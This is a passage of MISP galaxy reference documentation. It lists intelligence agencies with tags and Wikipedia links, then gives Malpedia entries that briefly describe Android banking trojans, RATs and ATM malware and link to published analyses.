Bureau of Military Intelligence

Military Intelligence Bureau (MIB)

The tag is: misp-galaxy:intelligence-agency="Bureau of Military Intelligence"

Table 1973. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_Military_Intelligence

State Committee for National Security (Tajikistan)

State Committee for National Security (SCNS) – Кумитаи давлатии амнияти милли (КДАМ)/Государственный комитет национальной безопасности (ГКНБ)

The tag is: misp-galaxy:intelligence-agency="State Committee for National Security (Tajikistan)"

Table 1974. Table References

Links

https://en.wikipedia.org/wiki/State_Committee_for_National_Security_(Tajikistan)

Tanzania Intelligence and Security Service

Tanzania Intelligence and Security Service (TISS)

The tag is: misp-galaxy:intelligence-agency="Tanzania Intelligence and Security Service"

Table 1975. Table References

Links

https://en.wikipedia.org/wiki/Tanzania_Intelligence_and_Security_Service

News Division

News Division

The tag is: misp-galaxy:intelligence-agency="News Division"

Internal Security Affairs Bureau (ISAB)

Internal Security Affairs Bureau (ISAB)

The tag is: misp-galaxy:intelligence-agency="Internal Security Affairs Bureau (ISAB)"

Bureau of Intelligence (BI)

Bureau of Intelligence (BI)

The tag is: misp-galaxy:intelligence-agency="Bureau of Intelligence (BI)"

Intelligence Bureau (IB)

Intelligence Bureau (IB)

The tag is: misp-galaxy:intelligence-agency="Intelligence Bureau (IB)"

Armed Forces Security Center (AFSC)

Armed Forces Security Center (AFSC)

The tag is: misp-galaxy:intelligence-agency="Armed Forces Security Center (AFSC)"

Army Military Intelligence Command (AMIC)

Army Military Intelligence Command (AMIC)

The tag is: misp-galaxy:intelligence-agency="Army Military Intelligence Command (AMIC)"

Department of Border Affair (DBA)

Department of Border Affair (DBA)

The tag is: misp-galaxy:intelligence-agency="Department of Border Affair (DBA)"

Directorate of Joint Intelligence (DJI)

Directorate of Joint Intelligence (DJI)

The tag is: misp-galaxy:intelligence-agency="Directorate of Joint Intelligence (DJI)"

Directorate of Intelligence Royal Thai Army (DINTRTA)

Directorate of Intelligence Royal Thai Army (DINTRTA)

The tag is: misp-galaxy:intelligence-agency="Directorate of Intelligence Royal Thai Army (DINTRTA)"

Directorate of Intelligence, RTAF (INTELLRTAF)

Directorate of Intelligence, RTAF (INTELLRTAF)

The tag is: misp-galaxy:intelligence-agency="Directorate of Intelligence, RTAF (INTELLRTAF)"

Naval Intelligence Department (NID)

Naval Intelligence Department (NID)

The tag is: misp-galaxy:intelligence-agency="Naval Intelligence Department (NID)"

Financial Intelligence Division (FID)

Financial Intelligence Division (FID)

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Division (FID)"

Internal Security Operations Command

Internal Security Operations Command (ISOC)

The tag is: misp-galaxy:intelligence-agency="Internal Security Operations Command"

Table 1976. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Operations_Command

National Intelligence Agency (Thailand)

National Intelligence Agency (NIA)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Agency (Thailand)"

Table 1977. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Agency_(Thailand)

National Intelligence Cooperating Center (NICC)

National Intelligence Cooperating Center (NICC)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Cooperating Center (NICC)"

Drug Intelligence Division (DID)

Drug Intelligence Division (DID)

The tag is: misp-galaxy:intelligence-agency="Drug Intelligence Division (DID)"

Special Branch Bureau

Special Branch Bureau (SBB)

The tag is: misp-galaxy:intelligence-agency="Special Branch Bureau"

Table 1978. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch_Bureau

Strategic Services Agency (SSA)[28]

Strategic Services Agency (SSA)[28]

The tag is: misp-galaxy:intelligence-agency="Strategic Services Agency (SSA)[28]"

Table 1979. Table References

Links

https://en.wikipedia.org#cite_note-28

Organised Crime and Intelligence Unit[30]

Organised Crime and Intelligence Unit[30]

The tag is: misp-galaxy:intelligence-agency="Organised Crime and Intelligence Unit[30]"

Table 1980. Table References

Links

https://en.wikipedia.org#cite_note-30

Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]

Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]"

Table 1981. Table References

Links

https://en.wikipedia.org#cite_note-31

National Intelligence Organization (Turkey)

National Intelligence Organization (MİT)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Organization (Turkey)"

Table 1982. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Organization_(Turkey)

Department of Smuggling, Intelligence, Operations and Information Collection (page does not exist)

Department of Smuggling, Intelligence, Operations and Information Collection (intelligence coordination)

The tag is: misp-galaxy:intelligence-agency="Department of Smuggling, Intelligence, Operations and Information Collection (page does not exist)"

Table 1983. Table References

Links

https://en.wikipedia.org/w/index.php?title=Department_of_Smuggling

Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (page does not exist)

Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (Intelligence Directorate)

The tag is: misp-galaxy:intelligence-agency="Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (page does not exist)"

Table 1984. Table References

Links

https://en.wikipedia.org/w/index.php?title=Emniyet_Genel_M%C3%BCd%C3%BCrl%C3%BC%C4%9F%C3%BC_%C4%B0stihbarat_Ba%C5%9Fkanl%C4%B1%C4%9F%C4%B1&action=edit&redlink=1

Terörle Mücadele Dairesi Başkanlığı(TEM) (page does not exist)

Terörle Mücadele Dairesi Başkanlığı(TEM) (Anti-Terrorism Department)

The tag is: misp-galaxy:intelligence-agency="Terörle Mücadele Dairesi Başkanlığı(TEM) (page does not exist)"

Table 1985. Table References

Links

https://en.wikipedia.org/w/index.php?title=Ter%C3%B6rle_M%C3%BCcadele_Dairesi_Ba%C5%9Fkanl%C4%B1%C4%9F%C4%B1(TEM)&action=edit&redlink=1

Gendarmerie Intelligence Directorate (page does not exist)

Gendarmerie Intelligence Directorate (law enforcement)

The tag is: misp-galaxy:intelligence-agency="Gendarmerie Intelligence Directorate (page does not exist)"

Table 1986. Table References

Links

https://en.wikipedia.org/w/index.php?title=Gendarmerie_Intelligence_Directorate&action=edit&redlink=1

Coast Guard Intelligence Directorate (page does not exist)

Coast Guard Intelligence Directorate (law enforcement)

The tag is: misp-galaxy:intelligence-agency="Coast Guard Intelligence Directorate (page does not exist)"

Table 1987. Table References

Links

https://en.wikipedia.org/w/index.php?title=Coast_Guard_Intelligence_Directorate&action=edit&redlink=1

General Staff Intelligence Directorate (page does not exist)

General Staff Intelligence Directorate (military intelligence)

The tag is: misp-galaxy:intelligence-agency="General Staff Intelligence Directorate (page does not exist)"

Table 1988. Table References

Links

https://en.wikipedia.org/w/index.php?title=General_Staff_Intelligence_Directorate&action=edit&redlink=1

Army Intelligence Department (page does not exist)

Army Intelligence Department (military intelligence)

The tag is: misp-galaxy:intelligence-agency="Army Intelligence Department (page does not exist)"

Table 1989. Table References

Links

https://en.wikipedia.org/w/index.php?title=Army_Intelligence_Department&action=edit&redlink=1

Navy Intelligence Department (page does not exist)

navy Intelligence Department (military intelligence)

The tag is: misp-galaxy:intelligence-agency="Navy Intelligence Department (page does not exist)"

Table 1990. Table References

Links

https://en.wikipedia.org/w/index.php?title=Navy_Intelligence_Department&action=edit&redlink=1

Air Force Intelligence Department (page does not exist)

Air Force Intelligence Department (military intelligence)

The tag is: misp-galaxy:intelligence-agency="Air Force Intelligence Department (page does not exist)"

Table 1991. Table References

Links

https://en.wikipedia.org/w/index.php?title=Air_Force_Intelligence_Department&action=edit&redlink=1

Ministry for National Security (Turkmenistan)

Ministry for National Security (MNS)

The tag is: misp-galaxy:intelligence-agency="Ministry for National Security (Turkmenistan)"

Table 1992. Table References

Links

https://en.wikipedia.org/wiki/Ministry_for_National_Security_(Turkmenistan)

Chief directorate of intelligence of the Ministry of Defence of Ukraine

Central Intelligence Directorate – Holovne Upravlinnya Rozvidky (HUR)

The tag is: misp-galaxy:intelligence-agency="Chief directorate of intelligence of the Ministry of Defence of Ukraine"

Table 1993. Table References

Links

https://en.wikipedia.org/wiki/Chief_directorate_of_intelligence_of_the_Ministry_of_Defence_of_Ukraine

Foreign Intelligence Service of Ukraine

Foreign Intelligence Service of Ukraine – Sluzhba Zovnishnioyi Rozvidky Ukrayiny (SZR or SZRU)

The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service of Ukraine"

Table 1994. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_of_Ukraine

State Bureau of Investigation (Ukraine)

State Bureau of Investigation – Derzhavne Biuro Rozsliduvan (DBR)

The tag is: misp-galaxy:intelligence-agency="State Bureau of Investigation (Ukraine)"

Table 1995. Table References

Links

https://en.wikipedia.org/wiki/State_Bureau_of_Investigation_(Ukraine)

Security Service of Ukraine

Security Service of Ukraine – Sluzhba Bezpeky Ukrayiny (SBU)

The tag is: misp-galaxy:intelligence-agency="Security Service of Ukraine"

Table 1996. Table References

Links

https://en.wikipedia.org/wiki/Security_Service_of_Ukraine

Signals Intelligence Agency

Signals Intelligence Agency (SIA)

The tag is: misp-galaxy:intelligence-agency="Signals Intelligence Agency"

Table 1997. Table References

Links

https://en.wikipedia.org/wiki/Signals_Intelligence_Agency

Joint Intelligence Organisation (United Kingdom)

Joint Intelligence Organisation (JIO)[32] – Joint intelligence analysis.

The tag is: misp-galaxy:intelligence-agency="Joint Intelligence Organisation (United Kingdom)"

Table 1998. Table References

Links

https://en.wikipedia.org/wiki/Joint_Intelligence_Organisation_(United_Kingdom)

MI5

Security Service/MI5[33] – Domestic counter terrorism and counter espionage intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="MI5"

Table 1999. Table References

Links

https://en.wikipedia.org/wiki/MI5

Office for Security and Counter-Terrorism

Office for Security and Counter-Terrorism (OSCT) – Counter terrorism and protecting critical national infrastructure.

The tag is: misp-galaxy:intelligence-agency="Office for Security and Counter-Terrorism"

Table 2000. Table References

Links

https://en.wikipedia.org/wiki/Office_for_Security_and_Counter-Terrorism

National Domestic Extremism and Disorder Intelligence Unit

National Domestic Extremism and Disorder Intelligence Unit (NDEDIU)[34] – Domestic counter extremism and public disorder intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="National Domestic Extremism and Disorder Intelligence Unit"

Table 2001. Table References

Links

https://en.wikipedia.org/wiki/National_Domestic_Extremism_and_Disorder_Intelligence_Unit

National Ballistics Intelligence Service

National Ballistics Intelligence Service (NBIS)[35] – Illegal firearms intelligence analysis.

The tag is: misp-galaxy:intelligence-agency="National Ballistics Intelligence Service"

Table 2002. Table References

Links

https://en.wikipedia.org/wiki/National_Ballistics_Intelligence_Service

National Fraud Intelligence Bureau

National Fraud Intelligence Bureau (NFIB)[36] – Economic crime intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="National Fraud Intelligence Bureau"

Table 2003. Table References

Links

https://en.wikipedia.org/wiki/National_Fraud_Intelligence_Bureau

Secret Intelligence Service

Secret Intelligence Service (SIS)/MI6[37] – Foreign intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="Secret Intelligence Service"

Table 2004. Table References

Links

https://en.wikipedia.org/wiki/Secret_Intelligence_Service

Defence Intelligence

Defence Intelligence (DI)[38] – Military intelligence analysis.

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence"

Table 2005. Table References

Links

https://en.wikipedia.org/wiki/Defence_Intelligence

Government Communications Headquarters

Government Communications Headquarters (GCHQ)[39] – Signals intelligence gathering and analysis.

The tag is: misp-galaxy:intelligence-agency="Government Communications Headquarters"

Table 2006. Table References

Links

https://en.wikipedia.org/wiki/Government_Communications_Headquarters

National Crime Agency

National Crime Agency (NCA)[40] – Organised crime intelligence gathering and analysis. Agency utilizes Unexplained wealth orders and the Investigatory Powers Act 2016.[41][42] NCA officers are posted overseas in around 50 countries.[43] They operate the UK Protected Persons Service, which includes witness protection.[44]

The tag is: misp-galaxy:intelligence-agency="National Crime Agency"

Table 2007. Table References

Links

https://en.wikipedia.org/wiki/National_Crime_Agency

Gangmasters and Labour Abuse Authority

Gangmasters and Labour Abuse Authority - Human trafficking, slavery, economic, and serious organised crime.

The tag is: misp-galaxy:intelligence-agency="Gangmasters and Labour Abuse Authority"

Table 2008. Table References

Links

https://en.wikipedia.org/wiki/Gangmasters_and_Labour_Abuse_Authority

Director of National Intelligence

Office of the Director of National Intelligence (ODNI)

The tag is: misp-galaxy:intelligence-agency="Director of National Intelligence"

Table 2009. Table References

Links

https://en.wikipedia.org/wiki/Director_of_National_Intelligence

Central Intelligence Agency

Central Intelligence Agency (CIA)

The tag is: misp-galaxy:intelligence-agency="Central Intelligence Agency"

Table 2010. Table References

Links

https://en.wikipedia.org/wiki/Central_Intelligence_Agency

Defense Intelligence Agency

Defense Intelligence Agency (DIA)

The tag is: misp-galaxy:intelligence-agency="Defense Intelligence Agency"

Table 2011. Table References

Links

https://en.wikipedia.org/wiki/Defense_Intelligence_Agency

National Security Agency

National Security Agency (NSA)

The tag is: misp-galaxy:intelligence-agency="National Security Agency"

Table 2012. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency

National Geospatial-Intelligence Agency

National Geospatial-Intelligence Agency (NGA)

The tag is: misp-galaxy:intelligence-agency="National Geospatial-Intelligence Agency"

Table 2013. Table References

Links

https://en.wikipedia.org/wiki/National_Geospatial-Intelligence_Agency

National Reconnaissance Office

National Reconnaissance Office (NRO)

The tag is: misp-galaxy:intelligence-agency="National Reconnaissance Office"

Table 2014. Table References

Links

https://en.wikipedia.org/wiki/National_Reconnaissance_Office

Military Intelligence Corps (United States Army)

Military Intelligence Corps (MIC)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Corps (United States Army)"

Table 2015. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Corps_(United_States_Army)

Marine Corps Intelligence

Marine Corps Intelligence (MCI)

The tag is: misp-galaxy:intelligence-agency="Marine Corps Intelligence"

Table 2016. Table References

Links

https://en.wikipedia.org/wiki/Marine_Corps_Intelligence

Office of Naval Intelligence

Office of Naval Intelligence (ONI)

The tag is: misp-galaxy:intelligence-agency="Office of Naval Intelligence"

Table 2017. Table References

Links

https://en.wikipedia.org/wiki/Office_of_Naval_Intelligence

Sixteenth Air Force

Sixteenth Air Force (16 AF)

The tag is: misp-galaxy:intelligence-agency="Sixteenth Air Force"

Table 2018. Table References

Links

https://en.wikipedia.org/wiki/Sixteenth_Air_Force

Space Delta 18

Space Delta 18 (DEL 18)

The tag is: misp-galaxy:intelligence-agency="Space Delta 18"

Table 2019. Table References

Links

https://en.wikipedia.org/wiki/Space_Delta_18

Office of Intelligence and Counterintelligence

Office of Intelligence and Counterintelligence (OICI)

The tag is: misp-galaxy:intelligence-agency="Office of Intelligence and Counterintelligence"

Table 2020. Table References

Links

https://en.wikipedia.org/wiki/Office_of_Intelligence_and_Counterintelligence

Coast Guard Intelligence

Coast Guard Intelligence (CGI)

The tag is: misp-galaxy:intelligence-agency="Coast Guard Intelligence"

Table 2021. Table References

Links

https://en.wikipedia.org/wiki/Coast_Guard_Intelligence

DHS Office of Intelligence and Analysis

DHS Office of Intelligence and Analysis (I&A)

The tag is: misp-galaxy:intelligence-agency="DHS Office of Intelligence and Analysis"

Table 2022. Table References

Links

https://en.wikipedia.org/wiki/DHS_Office_of_Intelligence_and_Analysis

DEA Office of National Security Intelligence

DEA Office of National Security Intelligence (ONSI)

The tag is: misp-galaxy:intelligence-agency="DEA Office of National Security Intelligence"

Table 2023. Table References

Links

https://en.wikipedia.org/wiki/DEA_Office_of_National_Security_Intelligence

FBI Intelligence Branch

FBI Intelligence Branch (IB)

The tag is: misp-galaxy:intelligence-agency="FBI Intelligence Branch"

Table 2024. Table References

Links

https://en.wikipedia.org/wiki/FBI_Intelligence_Branch

Bureau of Intelligence and Research

Bureau of Intelligence and Research (IR)

The tag is: misp-galaxy:intelligence-agency="Bureau of Intelligence and Research"

Table 2025. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_Intelligence_and_Research

Office of Terrorism and Financial Intelligence

Office of Terrorism and Financial Intelligence (TFI)

The tag is: misp-galaxy:intelligence-agency="Office of Terrorism and Financial Intelligence"

Table 2026. Table References

Links

https://en.wikipedia.org/wiki/Office_of_Terrorism_and_Financial_Intelligence

es:Secretaría de Inteligencia Estratégica de Estado

State Secretariat of Strategic Intelligence - Secretaría de Inteligencia Estratégica de Estado (SIEE)

The tag is: misp-galaxy:intelligence-agency="es:Secretaría de Inteligencia Estratégica de Estado"

es:Secretaría de Inteligencia Estratégica de Estado is also known as:

  • Secretaría de Inteligencia Estratégica de Estado

Table 2027. Table References

Links

https://en.wikipedia.orghttps://es.wikipedia.org/wiki/Secretar%C3%ADa_de_Inteligencia_Estrat%C3%A9gica_de_Estado

National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)

National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)

The tag is: misp-galaxy:intelligence-agency="National Directorate of Information and Intelligence - Dirección Nacional de Información e Inteligencia (DNII)"

State Security Service (Uzbekistan)

State Security Service - Davlat Xavfsizlik Xizmati (DXX)/ Служба государственной безопасности (СГБ)

The tag is: misp-galaxy:intelligence-agency="State Security Service (Uzbekistan)"

Table 2028. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_(Uzbekistan)

Bolivarian National Intelligence Service

Bolivarian National Intelligence Service - Servicio Bolivariano de Inteligencia (SEBIN)

The tag is: misp-galaxy:intelligence-agency="Bolivarian National Intelligence Service"

Table 2029. Table References

Links

https://en.wikipedia.org/wiki/Bolivarian_National_Intelligence_Service

Dirección General de Contrainteligencia Militar

Directorate General of Military Intelligence – Dirección General de Contrainteligencia Militar (DGCIM)

The tag is: misp-galaxy:intelligence-agency="Dirección General de Contrainteligencia Militar"

Table 2030. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_General_de_Contrainteligencia_Militar

General Department of Military Intelligence

General Department of Defence Intelligence (GDDI)/General Department II - Tổng cục Tình báo Quốc phòng (TBQP)/Tổng cục II (TC2)

The tag is: misp-galaxy:intelligence-agency="General Department of Military Intelligence"

Table 2031. Table References

Links

https://en.wikipedia.org/wiki/General_Department_of_Military_Intelligence

Political Security Organization

Political Security Organization (PSO)

The tag is: misp-galaxy:intelligence-agency="Political Security Organization"

Table 2032. Table References

Links

https://en.wikipedia.org/wiki/Political_Security_Organization

National Security Bureau (Yemen)

National Security Bureau (NSB)

The tag is: misp-galaxy:intelligence-agency="National Security Bureau (Yemen)"

Table 2033. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Bureau_(Yemen)

Central Intelligence Organisation

Central Intelligence Organisation (CIO)

The tag is: misp-galaxy:intelligence-agency="Central Intelligence Organisation"

Table 2034. Table References

Links

https://en.wikipedia.org/wiki/Central_Intelligence_Organisation

Counter Terrorism Group

Counter Terrorism Group (CTG)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism Group"

Table 2035. Table References

Links

https://en.wikipedia.org/wiki/Counter_Terrorism_Group

European Union Military Staff

European Union Military Staff (EUMS)

The tag is: misp-galaxy:intelligence-agency="European Union Military Staff"

Table 2036. Table References

Links

https://en.wikipedia.org/wiki/European_Union_Military_Staff

European Union Satellite Centre

European Union Satellite Centre (EU SatCen)

The tag is: misp-galaxy:intelligence-agency="European Union Satellite Centre"

Table 2037. Table References

Links

https://en.wikipedia.org/wiki/European_Union_Satellite_Centre

Regional Anti-Terrorist Structure

Regional Anti-Terrorist Structure (RATS)

The tag is: misp-galaxy:intelligence-agency="Regional Anti-Terrorist Structure"

Table 2038. Table References

Links

https://en.wikipedia.org/wiki/Regional_Anti-Terrorist_Structure

Malpedia

Malware galaxy cluster based on Malpedia..

Malpedia is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Davide Arcuri - Alexandre Dulaunoy - Steffen Enders - Andrea Garavaglia - Andras Iklody - Daniel Plohmann - Christophe Vandeplas

FastCash

The tag is: misp-galaxy:malpedia="FastCash"

FastCash is also known as:

Table 2039. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash

https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware

https://www.youtube.com/watch?v=zGvQPtejX9w

https://www.us-cert.gov/ncas/alerts/TA18-275A

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware

https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/

https://www.cisa.gov/uscert/ncas/alerts/TA18-275A

https://www.cisa.gov/uscert/ncas/alerts/aa20-239a

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://github.com/fboldewin/FastCashMalwareDissected/

https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html

https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf

888 RAT

The tag is: misp-galaxy:malpedia="888 RAT"

888 RAT is also known as:

Table 2040. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.888_rat

https://www.welivesecurity.com/2021/09/07/bladehawk-android-espionage-kurdish/

AbstractEmu

According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.

The tag is: misp-galaxy:malpedia="AbstractEmu"

AbstractEmu is also known as:

Table 2042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign

https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/

Agent Smith

The tag is: misp-galaxy:malpedia="Agent Smith"

Agent Smith is also known as:

Table 2046. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.agentsmith

https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

AhMyth

According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.

The tag is: misp-galaxy:malpedia="AhMyth"

AhMyth is also known as:

Table 2047. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth

https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/

https://www.secrss.com/articles/24995

https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w

https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset

https://deform.co/hacker-group-caracal-kitten-targets-kdp-activists-with-malware/

https://securelist.com/transparent-tribe-part-2/98233/

Anubis (Android)

BleepingComputer found that Anubis will display fake phishing login forms when users open up apps for targeted platforms to steal credentials. This overlay screen will be shown over the real app’s login screen to make victims think it’s a legitimate login form when in reality, inputted credentials are sent to the attackers.

In the new version spotted by Lookout, Anubis now targets 394 apps and has the following capabilities:

Recording screen activity and sound from the microphone Implementing a SOCKS5 proxy for covert communication and package delivery Capturing screenshots Sending mass SMS messages from the device to specified recipients Retrieving contacts stored on the device Sending, reading, deleting, and blocking notifications for SMS messages received by the device Scanning the device for files of interest to exfiltrate Locking the device screen and displaying a persistent ransom note Submitting USSD code requests to query bank balances Capturing GPS data and pedometer statistics Implementing a keylogger to steal credentials Monitoring active apps to mimic and perform overlay attacks Stopping malicious functionality and removing the malware from the device

The tag is: misp-galaxy:malpedia="Anubis (Android)"

Anubis (Android) is also known as:

  • BankBot

  • android.bankbot

  • android.bankspy

Table 2052. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis

https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb

https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus

https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html

https://0x1c3n.tech/anubis-android-malware-analysis

https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html

https://community.riskiq.com/article/85b3db8c

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://assets.virustotal.com/reports/2021trends.pdf

https://muha2xmad.github.io/malware-analysis/anubis/

https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis

https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/

http://blog.koodous.com/2017/05/bankbot-on-google-play.html

https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/

https://securelist.com/mobile-malware-evolution-2019/96280/

https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/

http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html

https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ [https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ]

https://pentest.blog/n-ways-to-unpack-mobile-malware/

https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html

https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html

http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html

https://www.youtube.com/watch?v=U0UsfO-0uJM

https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html

https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/

https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/

https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html

Ashas

The tag is: misp-galaxy:malpedia="Ashas"

Ashas is also known as:

Table 2055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas

https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/

ATANK

According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018. IT can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.

The tag is: misp-galaxy:malpedia="ATANK"

ATANK is also known as:

Table 2056. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank

https://twitter.com/LukasStefanko/status/1268070798293708800

AxBanker

According to EnigmaSoft, AxBanker is a banking Trojan targeting Android devices specifically. The threatening tool has been deployed as part of large attack campaigns against users in India. The threat actors use smishing (SMS phishing) techniques to smuggle the malware threat onto the victims' devices. The fake applications carrying AxBanker are designed to visually impersonate the official applications of popular Indian banking organizations. The weaponized applications use fake promises or rewards and discounts as additional lures.

The tag is: misp-galaxy:malpedia="AxBanker"

AxBanker is also known as:

Table 2057. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.axbanker

https://blog.polyswarm.io/phishing-and-android-malware-campaign-targets-indian-banks

https://www.trendmicro.com/en_vn/research/22/k/massive-phishing-campaigns-target-india-banks-clients.html#::text=We%20found%20five%20banking%20malware

BADCALL (Android)

remote access tool (RAT) payload on Android devices

The tag is: misp-galaxy:malpedia="BADCALL (Android)"

BADCALL (Android) is also known as:

Table 2058. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall

https://www.us-cert.gov/ncas/analysis-reports/ar19-252a

BadPatch

The tag is: misp-galaxy:malpedia="BadPatch"

BadPatch is also known as:

  • WelcomeChat

Table 2059. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch

https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/

BrasDex

According to PCrisk, BraDex is a banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.

At the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.

The tag is: misp-galaxy:malpedia="BrasDex"

BrasDex is also known as:

Table 2063. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.brasdex

https://www.threatfabric.com/blogs/brasdex-a-new-brazilian-ats-malware.html

BRATA

According to Cleafy, the victim’s Android device is factory reset after the attackers siphon money from the victim’s bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.

The tag is: misp-galaxy:malpedia="BRATA"

BRATA is also known as:

  • AmexTroll

Table 2064. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata

https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat

https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html

https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account

https://securelist.com/spying-android-rat-from-brazil-brata/92775/

https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam

https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again

